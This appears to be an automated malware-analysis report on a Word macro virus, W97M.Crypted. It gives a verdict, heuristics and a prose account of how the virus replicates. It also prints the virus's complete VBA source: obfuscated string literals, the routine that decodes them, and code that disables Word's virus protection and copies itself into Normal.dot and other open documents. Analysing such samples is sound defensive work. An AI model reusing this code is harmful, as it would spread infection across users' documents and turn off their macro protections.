Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document carrying a self-replicating VBA macro virus; the decoded source identifies itself as W97M.Crypted (aka W97M.Yuk). The AutoOpen macro in the "Crypted" module stores its real code as 14 obfuscated string literals, jack(1) to jack(14): the helper jacky() drops every character whose Asc() value is above 177, so the readable routine only appears once that high-byte padding is stripped, and AutoOpen then inserts the result at line 26 of the Crypted module if that line is still empty. The recovered routine is an AutoClose handler that sets Options.VirusProtection and Options.SaveNormalPrompt to False, writes the first 25 lines of the module to 'c:\nu.sys', and imports that file into the VBProject of NormalTemplate and of the active document whenever no "Crypted" component is present there yet, which is how the virus spreads to Normal.dot and to other documents. It then deletes its own decoded lines from the module, saves the document, and on the 31st of a month shows a message box signed "jACK tWOFLOWER". Nothing in the recovered code reaches the network: the only file written is c:\nu.sys, and the only file read is that same file via VBComponents.Import, so the finding is macro-virus replication rather than a downloader.
Heuristics (4)
- ClamAV: Doc.Trojan.Bleed-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Bleed-4
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the rule's canned text does not fit this sample: a VBA project was recovered (see the extracted macros.bas below), so here the finding duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9791 bytes | b0975b4738f54acf687ced3faccfe83f64497e5413b6c95f51c674b8962bd35f |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Crypted"
Sub AutoOpen(): Dim jack(14) As String
jack(1) = "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
jack(2) = "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷ݶÉÌ: c Àêµñ= ßÉç""AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë """"CrÊy½pt¸òeÒdÞ´íʹ"""""
jack(3) = "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
jack(4) = "Optiàons.Sa¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ Falùпse"
jack(5) = "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProŸ¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents(""CrºÌypàtedÔ¾Ñóø""ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdܼûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
jack(6) = "Ope¾ÜöÙðÎn ""cËÓíͶê:ì\nÛÚÜ´ÍuÅô.sysÝ"" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1"
jack(7) = "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËοmplúÉæatÝæe.VBPßroÑ÷Èjectí.VBü̶çÆCo÷Îþ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts(""CrypteÇ´dûÉùÎ""Åùèâ).NÝÔaÑïÇçme) ¼ÇÌ¿ö½= 0 ÝThe¹ÅòÌÈÀnÊ× NîÀormaõÜßöl츾Temp¼ÀæÃÊlate.VBÙÌåýßÖPrºæÛ뺽oject.¸ïVBCÜéo¼ÓÚmëøponents.ññîëImport Àû¾ëúä""c:ËÖ\nu.º×ÛÊsys"""
jack(8) = "I¾þÌèÃÐf LeníñóêÛ(ActiçvÒÝçâçeD̾×ÀóoÆücumëÐäeÄÕÜnt.VBõûãÁñProject.VBCo¼÷¾ÍÝmpoîØôòüÛnentsç¾¼éá(""C¾rèàÙßÄyptÝÏÇõÊüed""ØîÈ).Name)èïÏÂù = îäÂô0 ÓThenÍïÌÝì Actü¸×ÁüÕivíeåÚçDîoùÇcument.ÇÆVBProjôëØÔ¾eïÚÒ¸ÖcéÀ÷t´ðöï.óëÖVóòãíÑBComponenóÙäøöÀtÇÙÒïsÙáÂÊéË.Impüò»Øort ""c:ô½Ú\nu.syʼÜüs"""
jack(9) = "ThisDüÇocumeÛênt¿.VÌüÚBPrôoµÖject.VBCompoçåènenÆÖÉ×ètÝÛ˹Üs(""CãÑÄÈrÄÛ̵êyøptÞçöÁed"")çÌüæëï.CµÀodeMåèüÎëodule.DeÐûáÎßõlÿeteLinæÆ½Åes þìáÃË26, 9½´Ô"
jack(10) = "TÌìhñµisDûýûoÌÊñ´ýücumðñîÕ¸ÑenÝtµÝá¶Ïß.Ô»¾ÚÀùVBPËÁ¼ï¿roÍjeÏÓÕñÀËct.ÛÌüÔÂÛVBCoþ½ÏmpÜиçðËoneÚðÝÆ´Ünts(""ζúCÖryöýè¾Ð¹ptÛedÌ»ö"").êã¼ßéCodeMìóü¿ÝodîÊÒ÷Ûulãêå¶ûe.DeäÈÁleteÃLineÆs 26޵ƻ,ʽ¸ñ 5"
jack(11) = "Iåf ¹ðDay(äøÑÄNowù÷()) ¿÷= 3ÙºÖð1 ºæÆÜÓ·Then ÖMïsgà¾Æø¶BÎox ¿Ñûëº""n¿ï»ðôEVÖERÜáú kN¾ÅéÜOW nOùåÔËóTHING!""ÀÄÄ, 0,ß¶¾È½ ·ç""j¹»ÝÑACKÑøÇÌ tWOFLOWãåER /LóËÎÛÓázÀ¾¶×¶ó0/äMetúÇa"""
jack(12) = "If AñÝ¿êÒÜctÐiveæîæéÔàDocößóumentÊ.SavàeüÕÊÅüüd =Òé F¹åalse ×½äTרëÑh¸Àßúßóen AcÇèóïÊtàivþº´åÊÃeDùØëµãocumºØe½ÜÈnt.SaveAs ActíÑiveDïàÓÞÎoçÄàcÞÉáÚÄçuìmçÑÜ÷êÞent.ÑîÉãÝÆFulÓÀlName»àÔÅù"
jack(13) = "AcÍùðÑòÖtÍivÊËeÁDocuÒýÚêmùݸÖeÅåÆÕnµÉ¹´têÞç´.èõæClosÒe wdãñîó»DêÌoNotîääñÜSÎaÓveCÔÑhanã×geåÜçÙs"
jack(14) = "End ïÕØSÕ¹ÓÊuËüöÖàÄb"
For i = 1 To 14: vc = vc & jacky(jack(i)): Next i
If ThisDocument.VBProject.VBComponents("Crypted").CodeModule.Lines(26, 1) = "" Then ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 26, vc
End Sub
Function jacky(c As String)
For o = 1 To Len(c): z = Mid(c, o, 1)
If Asc(z) > 177 Then z = ""
x = x & z
Next o: jacky = x & vbCr
End Function
' W97M.Crypted aka W97M.Yuk written by Jack Twoflower [LineZer0]&[Metaphase]
' Processing file: /opt/analyzer/scan_staging/7d6874c885384629a3ec4c1b2ffad9fc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3066 bytes
' Macros/VBA/Crypted - 14214 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' BoS 0x0000
' Dim
' OptionBase
' LitDI2 0x000E
' VarDefn jack (As String)
' Line #1:
' LitStr 0x0022 "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
' LitDI2 0x0001
' ArgsSt jack 0x0001
' Line #2:
' LitStr 0x007B "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷ݶÉÌ: c Àêµñ= ßÉç"AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë ""CrÊy½pt¸òeÒdÞ´íʹ"""
' LitDI2 0x0002
' ArgsSt jack 0x0001
' Line #3:
' LitStr 0x003D "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
' LitDI2 0x0003
' ArgsSt jack 0x0001
' Line #4:
' LitStr 0x003D "Optiàons.Sa¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ Falùпse"
' LitDI2 0x0004
' ArgsSt jack 0x0001
' Line #5:
' LitStr 0x00A6 "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProŸ¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents("CrºÌypàtedÔ¾Ñóø"ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdܼûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
' LitDI2 0x0005
'
... (truncated)